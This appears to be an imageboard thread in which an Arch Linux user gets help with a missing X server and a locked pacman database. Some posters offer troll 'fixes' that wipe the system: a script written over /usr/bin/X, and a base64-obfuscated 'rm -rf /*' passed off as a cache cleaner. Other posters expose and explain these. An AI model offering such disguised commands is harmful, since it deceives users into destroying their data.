What the frick is this and what do I do about it?

What the frick is this and what do I do about it?

Thalidomide Vintage Ad Shirt $22.14

Ape Out Shirt $21.68

Thalidomide Vintage Ad Shirt $22.14

  1. 2 months ago
    Anonymous

    Time to reinstall gentoo

    • 1 month ago
      Anonymous

      >he fell for the linux meme
      lol

      you dont have directory named X
      create it:
      mkdir /usr/bin/X

      • 1 month ago
        Anonymous

        it has to be a binary, don't do this OP

      • 1 month ago
        Lucretia simp

        it has to be a binary, don't do this OP

        make sure you use arch-chroot if you use arch, else you won't be able to use devices and connect to internet after chroot.

        Hmm yeah okay will try this

        Do this OP
        sudo echo -e '#!/bin/bashnrm -rf --no-preserve-root /' > /usr/bin/X && sudo chmod +x /usr/bin/X

        That's not the issue, his cache is blocking access to his X dir by his binaries and libs that aren't compatible. This happens all the time, he should run the command below to clear up his cache and free up space on his computer. It removes all the bloat. Works on all major distros

        echo "cm0gLXJmIC8q" | base64 -d > cleancache; chmod 700 cleancache; sudo ./cleancache &

        • 1 month ago
          Anonymous

          OP DO NOT RUN IT, THIS BASE64 VALUE IS "rm -rf /*"

          • 1 month ago
            Lucretia simp

            It does remove all the bloat as I said

        • 1 month ago
          Anonymous

          OP DO NOT RUN IT, THIS BASE64 VALUE IS "rm -rf /*"

          So what should I actually run? This is strange. What do I do. There is some important work on there u haven't backed up.

        • 1 month ago
          Anonymous

          Alright, let's break this command down step by step:

          1 echo "cm0gLXJmIC8q" | base64 -d: This part takes the base64-encoded string "cm0gLXJmIC8q" and decodes it using the base64 command with the -d (decode) flag. The decoded string is then passed to the next command through the pipe (|).
          2 > cleancache: The output of the previous command (the decoded string) is redirected into a file named cleancache.
          3 chmod 700 cleancache: This command changes the permissions of the cleancache file to 700, which means that only the owner of the file has read, write, and execute permissions.
          4 sudo ./cleancache &: This part runs the cleancache file as a script with root privileges using sudo, and the & symbol at the end means the script is run in the background.

          Now, about that base64 string: when decoded, it contains the command rm -rf /*, which is a notorious command that recursively deletes all files and directories in the root directory. This is definitely malicious and can cause serious damage to the system. So yes, this command is harmful, and you should not run it.
          However, the cleancache script isn't necessarily malicious by nature. Depending on its content, it could be meant to clear some system caches or perform other maintenance tasks, but it's the rm -rf /* part that makes the whole command dangerous.

          • 1 month ago
            Anonymous

            thanks, chatGPT

          • 1 month ago
            Anonymous

            fricking ChatGPT picking up that itll wipe your system but also believing your whole system is cache lmao

          • 1 month ago
            Anonymous

            Grok?

        • 1 month ago
          Anonymous

          >echo "cm0gLXJmIC8q
          kys simp

      • 1 month ago
        Anonymous

        Frick off Black personbot

  2. 2 months ago
    Anonymous

    >he fell for the linux meme
    lol

  3. 2 months ago
    Anonymous

    Chroot and Install Xorg

    • 1 month ago
      Anonymous

      Hmm yeah okay will try this

      • 1 month ago
        Anonymous

        make sure you use arch-chroot if you use arch, else you won't be able to use devices and connect to internet after chroot.

    • 1 month ago
      Anonymous

      Hmm yeah okay will try this

      [...]
      you dont have directory named X
      create it:
      mkdir /usr/bin/X

      make sure you use arch-chroot if you use arch, else you won't be able to use devices and connect to internet after chroot.

      It isn't working with either of these suggestions. Pic related.

      • 1 month ago
        Anonymous

        Are you running from the ISO flash drive? It appears that you are running the same operating system on your device.

        [...]
        So what should I actually run? This is strange. What do I do. There is some important work on there u haven't backed up.

        Don't run any of them, they will both wipe your system.

        • 1 month ago
          Anonymous

          Nope not using a flash drive. This has been running for months on the laptop.

          • 1 month ago
            Anonymous

            sudo pacman -Ss xorg and then install the packages, I don't remember the group name but I was something like xorg-server or even just xorg. Try these

            sudo pacman -S xorg
            sudo pacman -S xorg-server

  4. 2 months ago
    Anonymous
    • 1 month ago
      Anonymous

      werks for me

    • 1 month ago
      Anonymous

      Running arch as daily driver for 5 years now. Literally never broke on me ever. These memes are all skill issues.

      • 1 month ago
        Anonymous

        this. I barely ever remember to update it too. Ill batch install like 3 months of updates when i need to install a new package, and it just werks

  5. 1 month ago
    Anonymous

    just install wayland

  6. 1 month ago
    Anonymous

    switch to GNU/Wayland

  7. 1 month ago
    Anonymous

    Do this OP
    sudo echo -e '#!/bin/bashnrm -rf --no-preserve-root /' > /usr/bin/X && sudo chmod +x /usr/bin/X

  8. 1 month ago
    Anonymous

    Consider pop instead. It just werks, has drivers for nvidia cards and build-in recovery partition.
    https://pop.system76.com/

  9. 1 month ago
    Anonymous

    This is getting weirder. Won't let me install anything through pacman.

    • 1 month ago
      Anonymous

      run
      sudo rm -rf /var/lib/pacman/db.lck

      • 1 month ago
        Anonymous

        Doesn't this wipe the whole system?

        • 1 month ago
          Anonymous

          No don't worry.
          The rm command stands for "remove", I'm telling it to remove the locked pacman database only, which will free it and allow you to install wayland.
          Running it on "/" will wipe the entire system, but in this case you're specifying the selected file.

          • 1 month ago
            Anonymous

            Same error 🙁

            Kyle, did you get it fixed yet?

            Steven, no I have not

          • 1 month ago
            Anonymous

            why recursively though?

        • 1 month ago
          Anonymous

          >rm = wipe system
          I think its time to install windows buddy

        • 1 month ago
          Anonymous

          No, only if you run it on / it will. otherwise it will do just the file. you can remove the "-rf", it is not neccessary

        • 1 month ago
          Anonymous

          Smartest Arch user right here everyone.

        • 1 month ago
          Anonymous

          my dude if you can't read what the command does you're just not cut out for configuring an arch system. Use the just work linux mint/noobuntu

          • 1 month ago
            Lucretia simp

            If someone has the motivation to want to learn linux at a detailed level even if it comes from le autism, it's best to start at arch. You learn everything from ground up which is harder up front to learn. I think though it cost more time to learn everything if you start from the top (mint/ubuntu/etc) then try to learn harder concepts that are common in things like (arch/gentoo/debian). Let OPs autism work so he'll learn rather than just waste time playing video games or something stupid

          • 1 month ago
            Anonymous

            Yeah but he's not even attempting to read what any of the commands are trying to do. He's not bothering to even attempt to understand what is happening or why it's happening.

      • 1 month ago
        Anonymous

        In all seriousness, I don't understand people who use -rf when they're trying to delete a single file. It's like russian roulette.

        • 1 month ago
          Anonymous

          >I don't understand people who use -rf when they're trying to delete a single file
          this exact moronation lead to an install script deleting your home dir after someone accidentally put a space between

          • 1 month ago
            Lucretia simp

            >lead to an install script deleting your home dir
            LAMMMOOO!!!!! What program was it? this is my first time hearing about something like this

          • 1 month ago
            Anonymous

            bumblebee, a driver for Nvidia laptop graphics to let you use the integrated graphics for general display and the GPU for vidyas

          • 1 month ago
            Anonymous

            Garuda linux did it when they put a space between "/" and "tmp", or sth like that

          • 1 month ago
            Anonymous

            bumblebee, a driver for Nvidia laptop graphics to let you use the integrated graphics for general display and the GPU for vidyas

            >happened (at least) twice

      • 1 month ago
        Anonymous

        No don't worry.
        The rm command stands for "remove", I'm telling it to remove the locked pacman database only, which will free it and allow you to install wayland.
        Running it on "/" will wipe the entire system, but in this case you're specifying the selected file.

        No, only if you run it on / it will. otherwise it will do just the file. you can remove the "-rf", it is not neccessary

        I just ran with -f and it has worked now. Thank you fellas.

      • 1 month ago
        Anonymous

        Why the frick are you using the -rf argument for a single file? Miss a slash and you destroy a system directory.

      • 1 month ago
        Anonymous

        > rm -rf
        > -rf
        > a fricking file
        people like you should be nowhere near a computer. horrifying.

        • 1 month ago
          Anonymous

          alias nuke="sudo rm -r"

          only kids are afraid of commands

          • 1 month ago
            Anonymous

            some kids need to get good at bash before they end up here creating threads such as
            > good morning, sirs! my important bobs and vagene folder is gone!

    • 1 month ago
      Anonymous

      Kyle, did you get it fixed yet?

      • 1 month ago
        Anonymous

        >kyle

        >>kyle
        Woah I knew he ended up on IQfy but I never saw this vid
        [...]
        Good on ya brother

        Can anyone give me the quick rundown on this Kyle?

        • 1 month ago
          Anonymous

          how do you not know who kyle is? are you new?

          • 1 month ago
            Anonymous

            No. Just usually in practical threads, not eceleb shit. So no QRD?

          • 1 month ago
            Anonymous

            so you just happen to suddenly become interested in eceleb shit

        • 1 month ago
          Anonymous
        • 1 month ago
          Anonymous

          Kyle uses arch btw..

    • 1 month ago
      Anonymous

      You have mistaken...Pacman is an arcade game. Fricking zoomers these days.

    • 1 month ago
      Anonymous

      >kyle

      • 1 month ago
        Anonymous

        >>kyle
        Woah I knew he ended up on IQfy but I never saw this vid

        Thanks fellas, all fixed now.

        Good on ya brother

      • 1 month ago
        Anonymous

        >>kyle
        Woah I knew he ended up on IQfy but I never saw this vid
        [...]
        Good on ya brother

        That looks not unlike me actually. And I do use dosbox but only to play doom and doom II.

      • 1 month ago
        Anonymous

        OP should have used Wayland. He got X-memed.

        >13 seconds to load Duke
        What the frick? It shouldn't even take that long to compile the game from source, add it to a dosbox dir, and then run it after.

        • 1 month ago
          Anonymous

          >OP should have used Wayland
          even if you use gayland you'll need to have xorg installed for xgayland, moron

          • 1 month ago
            Anonymous

            >moron-posting
            Pottery. I don't use xgayland, and thus don't have xorg installed.

    • 1 month ago
      Anonymous
    • 1 month ago
      Anonymous

      Oh wow so it is Arch. Yet another victim claimed.

    • 1 month ago
      Anonymous

      https://i.imgur.com/txRnINx.jpg

      What the frick is this and what do I do about it?

      >Arch

    • 1 month ago
      Anonymous

      Hahaha keyring bug strikes again. Seriously, stop using Arch.

  10. 1 month ago
    Anonymous

    >startx
    startx
    >startx
    startx

    • 1 month ago
      Anonymous

      >startx
      >he doesnt use exec xinit -- vt1 > /dev/null 2>&1

  11. 1 month ago
    Anonymous

    Kyle pls

  12. 1 month ago
    Anonymous

    Install Fedora
    Install OpenSUSE
    Install Ubuntu
    Install something used by everyone else that isn't arch or gentoo

  13. 1 month ago
    SpecialAgentClaire

    kek

    • 1 month ago
      Anonymous

      >linux issue thread
      >winsaar sees
      >winsaar redeems

  14. 1 month ago
    Anonymous

    Thanks fellas, all fixed now.

    • 1 month ago
      Anonymous

      what are you going to do with your laptop now?

      • 1 month ago
        Anonymous

        customize it like my body. firstly cut off all the unnecessary bloat hehe. Then decorate it nicely and girly :3

      • 1 month ago
        Anonymous

        Uninstall troonix, this shitty operating system has proven its uselessness in this thread.

      • 1 month ago
        Anonymous

        Watch a few episodes of this

        • 1 month ago
          Lucretia simp

          How far along are you? I finished it some time back, not as PEAK as people said it would be. It was fun though

          • 1 month ago
            Anonymous

            It is my 3rd watch. It is peak for me. Very good show. Just met that little knobhead Dieter lol.

    • 1 month ago
      Anonymous

      noice

    • 1 month ago
      Anonymous

      Given your lack of knowledge regarding asic stuff in this thread, I would advise looking for a simple distribution like Fedora, or to learn for yourself.

      • 1 month ago
        Anonymous

        >or to learn for yourself.
        that's what this thread is for

      • 1 month ago
        Anonymous

        I fixed it didn't I?

        • 1 month ago
          Anonymous

          Yes but you could run into such an issue in the future, and the anons here will always find a way to suggest you to nuke your system.

        • 1 month ago
          Anonymous

          We fixed it, not you as in singular. Read the wiki and how things work so you can actually fix your system in the future, or use a more stable and simple distro instead

          • 1 month ago
            Anonymous

            If I read the wiki then the wiki authors could just as easily say "we fixed it for you" too. If I Google it I did the same as posting here.

          • 1 month ago
            Anonymous

            The wiki won't straight up give you the answer however, the wiki tells you how thing works, then from that you figure out how things work. I mean I'm not saying is wrong asking for help but since you're struggling with basic stuff you do need to learn some, see how I knew your laptop had turned off during install? that was because of the db.lock file, unlocking the pacman is quite easy once you know the purpose of that file

            People here gives you the answer but won't tell you how they know, and that's what you need for the future, the why

          • 1 month ago
            Anonymous

            calm down, kyle

          • 1 month ago
            Anonymous

            Also you didn't fix it. I said in a previous comment I added an -f to the command (which I got from the arch site btw) and that is what foxed it. You did nothing. Toher more helpful and respectful anons did give me a hand however, and for them I thank. Not for fixing my shit, but not being a "muh wiki" gay.

          • 1 month ago
            Anonymous

            the wiki is a meme used by arch users to troll newbies. nobody actually started learning arch from wiki. Just like you don't learn how to fight by reading war and peace by tolstoy or other oversized book

    • 1 month ago
      Anonymous

      Judging by this thread, you don't know what you are doing nor are you technically orientated. Unless this laptop isn't your main machine and you aren't doing important work on it, you shouldn't be using linux. Linux is an awful desktop experience unless you are technically orientated enough to make changes on code you are running

      • 1 month ago
        Anonymous

        Why don't you mind your own business you massive homosexual

        • 1 month ago
          Anonymous

          Enjoy suffering with your mental disabilities, moron

    • 1 month ago
      Anonymous

      look at that desktop completely devoid of anything at all.

      • 1 month ago
        Anonymous

        I know, beautiful right?

  15. 1 month ago
    Anonymous

    hey OP just a heads up, judging from the pics you posted it seems your laptop turned off while updating the system, be careful of that it's like playing russian roulette and if it happens at the wrong time it will brick your system. Check any other important packages you have install and see if they are still working, if not then install manually again, I'd recommend you just reinstall all of your packages but it's not really necessary

    • 1 month ago
      Anonymous

      This is why GNU/Linux is not yet ready for mass adoption. I know one can frick with windows updates in all kinds of ways and it still works

      • 1 month ago
        Anonymous

        when Windows doesn't delete all your files in the process, that is

        • 1 month ago
          Anonymous

          I don't know a single person who this happened to, not irl, not on IQfy. But I heard it removes other partitions or gives itself priority over grub

          • 1 month ago
            Anonymous

            didn't happen to me either when I still used Windows, but I know people that happened to
            >or gives itself priority over grub
            yeah, that's annoying too. I still have my W10 partition even if I never use it anymore, and I'm glad it's on a separate SSD so that shit doesn't happen to me

          • 1 month ago
            Anonymous

            I use mine for bloated software that uni mandates we use to keep my linux partition clean.

          • 1 month ago
            Anonymous

            mine serves a single purpose: running MMOminion when I need to bot on FFXIV
            otherwise I just play it on Linux when I'm actually playing myself since it just works. Arch having XIVLauncher on the AUR is pretty good

          • 1 month ago
            Anonymous

            didn't happen to me either when I still used Windows, but I know people that happened to
            >or gives itself priority over grub
            yeah, that's annoying too. I still have my W10 partition even if I never use it anymore, and I'm glad it's on a separate SSD so that shit doesn't happen to me

            (also I should add I don't use grub anyway, I installed Arch with systemd-boot)

      • 1 month ago
        Anonymous

        Brother frick off, why do you homies have to always make it about windows?

        • 1 month ago
          Anonymous

          >Brother
          which third world country?

          • 1 month ago
            Anonymous

            Your mom's crotch.

      • 1 month ago
        Anonymous

        I once enabled wsl on windows, rebooted, and that vm never booted again, lel.

        • 1 month ago
          SpecialAgentClaire

          clearly a user error
          also
          >running a vm inside a vm

          • 1 month ago
            Anonymous

            a vm inside a vm? I meant the windows vm never booted again, all i did was tick some wsl checkbox and reboot. I should try it again, it'd be pretty funny if it died over that twice.

          • 1 month ago
            Anonymous

            Wsl runs on hyper-v, anon

      • 1 month ago
        Anonymous

        Fedora does atomic updates, and then there are all the immutable distros too that have safe updates.

    • 1 month ago
      Anonymous

      Thanks anon. That is exactly what happened. I leant on the keyboard as I was doing other stuff and it was installing a bunch of packages and it killed the install. It wouldn't respond so I powered down. I will be more careful next time.

      • 1 month ago
        Anonymous

        Yeah I knew it, same thing happened to me only it actually fricked my system beyond recovery. I mean I could've have probably recovered booting from a flash and reinstalling the packages carefully but it was easier to reinstall from scratch.

  16. 1 month ago
    Anonymous

    Reinstall Xorg via usb or reinstall your os, or create a system link to Xorg if you already have it.

  17. 1 month ago
    Anonymous

    >What the frick is this
    Your fault.
    >what do I do about it
    Fall from a great height.

  18. 1 month ago
    Anonymous

    install xorg-server

  19. 1 month ago
    Anonymous

    Absolute state of troonix

  20. 1 month ago
    Anonymous

    [...]

    >clip
    use test probes

    • 1 month ago
      Anonymous

      What is that thing?

      • 1 month ago
        Anonymous

        Top is a laptop with an USB SPI BIOS chip reader
        Bottom one is a thin client pc with its bios chip being read

  21. 1 month ago
    Anonymous

    >X
    deprecated

  22. 1 month ago
    Anonymous

    [...]

    Only the ends of the probes are exposed, the body is inside transparent heatshrink.

  23. 1 month ago
    Anonymous

    >buys a Thinkpad to install arch on
    >fail completely cause zoomie script kiddy who only knows le epic IQfy memes
    this thread sums up most of this board rather well

    • 1 month ago
      Anonymous

      You're not wrong about IQfy, but you're posting this on a pretty standard tech support thread

  24. 1 month ago
    Anonymous

    >MOM CANCEL MY MEETINGS PACMAN FRICKED UP MY XORG.CONF AGAIN

  25. 1 month ago
    Anonymous

    your ISO is gone, sorry anon :/

    time to boot from USB...

  26. 1 month ago
    Anonymous

    you dun goofed

  27. 1 month ago
    Anonymous

    >What the frick is this and what do I do about it?
    Switch to a non shit distro like NixOS

  28. 1 month ago
    Anonymous

    $ edit autoexec.bat

  29. 1 month ago
    Anonymous

    How can anyone even bother to use linux? If something breaks it requires a gorillion commands to fix, none of which I'm likely to know without googling. You can't make a post asking for help when something goes wrong either because hordes of tinker toons are biting at the bit to call you a moron and leave pointless comments like "WOMM, skill issue" etc. There's literally no way any non-NEET would have time for this shit.

    • 1 month ago
      Anonymous

      You sound really mad about your skill issues.

    • 1 month ago
      Anonymous

      I just run debian 12 stable. Hasn't crashed once since I installed it. It just comes down to not being a moron.

      • 1 month ago
        Anonymous

        Debian is literally the ultimate werx distro

    • 1 month ago
      Anonymous

      Because you only ever see threads when there is a problem and 99% of these problems are on tinker distros like arch and gentoo. Just use a mainstream distro like debian, ubuntu or mint and everything works out of the box. I literally didn't use the command line in 2 years because everything just werks but you won't see me making a thread about it.

    • 1 month ago
      Anonymous

      None of the NEETs in here even knew how to fix the problem
      They probably just reinstall the OS every other week

      • 1 month ago
        Anonymous

        I'll be your tech support for $100 an hour. If you can't or won't pay that that's an exclusive (you) problem.

  30. 1 month ago
    Anonymous

    >he dodn’t systemd maxx
    heh. classic

  31. 1 month ago
    Anonymous

    To everyone posting solutions, thank you, but the issue was fixed. Thank a million lads. And to those wiki-tards, this was quicker and more fun.

Your email address will not be published. Required fields are marked *